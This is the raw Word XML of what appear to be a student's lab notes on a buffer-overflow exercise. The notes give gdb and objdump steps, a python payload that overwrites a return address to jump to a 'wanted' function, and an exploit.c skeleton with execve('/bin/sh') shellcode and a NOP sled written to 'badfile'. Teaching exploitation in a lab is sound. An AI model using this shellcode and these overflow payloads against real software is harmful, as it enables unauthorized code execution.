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7AE5A" w14:textId="0FA882A6" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r>
        <w:t>Gdb ./buf_ovf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD46FE0" w14:textId="095E7554" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r>
        <w:t>(gdb) break copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EB2B1E" w14:textId="32976859" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r>
        <w:t>(gdb) run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBCA22" w14:textId="69A81386" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r>
        <w:t xml:space="preserve">(gdb) print &amp;buff </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D22EC3">
        <w:t xml:space="preserve">$1 = (char (*)[5]) </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5374">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0xbfffef2b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781A9FA6" w14:textId="5E8CDCCA" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r>
        <w:t xml:space="preserve">(gdb) info frame </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D22EC3">
        <w:t>eip at 0x</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5374">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bfffef3c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3040FAC9" w14:textId="4F3BD9E8" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r>
        <w:t>(gdb) quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58018992" w14:textId="23F1F35E" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r w:rsidRPr="00D22EC3">
        <w:t>objdump -d ./buff_ovf | grep wanted</w:t>
      </w:r>
      <w:r w:rsidR="003F5374">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F5374">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="003F5374">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F5374" w:rsidRPr="003F5374">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0804843b</w:t>
      </w:r>
      <w:r w:rsidR="003F5374" w:rsidRPr="003F5374">
        <w:t xml:space="preserve"> &lt;wanted&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5C64F2" w14:textId="7C7C6617" w:rsidR="00D22EC3" w:rsidRDefault="00D22EC3">
      <w:r w:rsidRPr="00D22EC3">
        <w:t>python -c 'print "A" * 1</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00D22EC3">
        <w:t xml:space="preserve"> + "\x3b\x84\x04\x08"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A220AD" w14:textId="476A6614" w:rsidR="009015BE" w:rsidRDefault="009015BE">
      <w:r>
        <w:t>gdb ./buff_ovf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030C120E" w14:textId="59BB677F" w:rsidR="009015BE" w:rsidRDefault="009015BE">
      <w:r w:rsidRPr="009015BE">
        <w:t>(gdb) run $(python -c 'print "A" * 1</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="009015BE">
        <w:t xml:space="preserve"> + "\x3b\x84\x04\x08"')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AD9BBD" w14:textId="03FCCF88" w:rsidR="007F65BD" w:rsidRDefault="007F65BD">
      <w:r>
        <w:t>----------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CD22AA" w14:textId="1B0E2A6F" w:rsidR="007F65BD" w:rsidRDefault="007F65BD">
      <w:r>
        <w:t>3.2 task1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6627CE34" w14:textId="44042BC7" w:rsidR="007F65BD" w:rsidRDefault="007F65BD">
      <w:r w:rsidRPr="007F65BD">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nano exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A606276" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t>#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE3DD5" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D86DC9C" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t>#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA2A68" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="6BC9BA89" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t>char shellcode[] =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3506030B" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x31\xc0"             /* xorl %eax,%eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF9EC7" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x50"                 /* pushl %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B13B4" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x68""//sh"           /* pushl $0x68732f2f */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DFD14F" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x68""/bin"           /* pushl $0x6e69622f */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D9347" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x89\xe3"             /* movl %esp,%ebx */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7BA86" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x50"                 /* pushl %eax */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627B7534" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x53"                 /* pushl %ebx */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C3384" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "\x89\xe1"             /* movl %esp,%ecx */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476130CF" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\x99"                 /* cdq */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A5794" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\xb0\x0b"             /* movb $0x0b,%al */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1EB590" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    "\xcd\x80";            /* int $0x80 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27282543" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="4A2A4DE9" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t>void main(int argc, char **argv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FBC3ED" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C984498" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    char buffer[517];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C71D4" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    FILE *badfile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7C089" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="41A21E9D" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    /* Initialize buffer with 0x90 (NOP instruction) */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037D3485" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    memset(&amp;buffer, 0x90, 517);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755490BB" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="48413B89" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    /* You need to fill the buffer with appropriate contents here */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0995DC4D" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="55312E2B" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    /* Save the contents to the file "badfile" */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC50A4D" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    badfile = fopen("./badfile", "w");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54290E47" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    fwrite(buffer, 517, 1, badfile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46159F9F" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t xml:space="preserve">    fclose(badfile);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC5A049" w14:textId="46996AD5" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EECF5" w14:textId="3FA33305" w:rsidR="007F65BD" w:rsidRDefault="00DE6E8C" w:rsidP="007F65BD">
      <w:r w:rsidRPr="00DE6E8C">
        <w:t>gcc -o exploit exploit.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75099987" w14:textId="2E1DF399" w:rsidR="00DE6E8C" w:rsidRDefault="00DE6E8C" w:rsidP="007F65BD">
      <w:r w:rsidRPr="00DE6E8C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E16F266" wp14:editId="0B539FBA">
            <wp:extent cx="5943600" cy="479425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172144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48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EB94" w14:textId="77777777" w:rsidR="00DE6E8C" w:rsidRDefault="00DE6E8C" w:rsidP="007F65BD"/>
    <w:p w14:paraId="0CEA1F23" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="3BB58262" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="6925AC6A" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:p w14:paraId="6C05345D" w14:textId="77777777" w:rsidR="007F65BD" w:rsidRDefault="007F65BD" w:rsidP="007F65BD"/>
    <w:sectPr w:rsidR="007F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AF"/>
    <w:rsid w:val="002C78AF"/>
    <w:rsid w:val="003A7E83"/>
    <w:rsid w:val="003B1CC5"/>
    <w:rsid w:val="003F5374"/>
    <w:rsid w:val="007F65BD"/>
    <w:rsid w:val="008310DE"/>
    <w:rsid w:val="009015BE"/>
    <w:rsid w:val="00A07641"/>
    <w:rsid w:val="00AD2323"/>
    <w:rsid w:val="00C75EE5"/>
    <w:rsid w:val="00D22EC3"/>
    <w:rsid w:val="00D75BD2"/>
    <w:rsid w:val="00DE6E8C"/>
    <w:rsid w:val="00E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325F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{24668ADF-0433-4E2B-9015-6DC0F613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Đức</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Thành Nguyễn Đức</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-16T17:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-26T07:30:00Z</dcterms:modified>
</cp:coreProperties>
</file>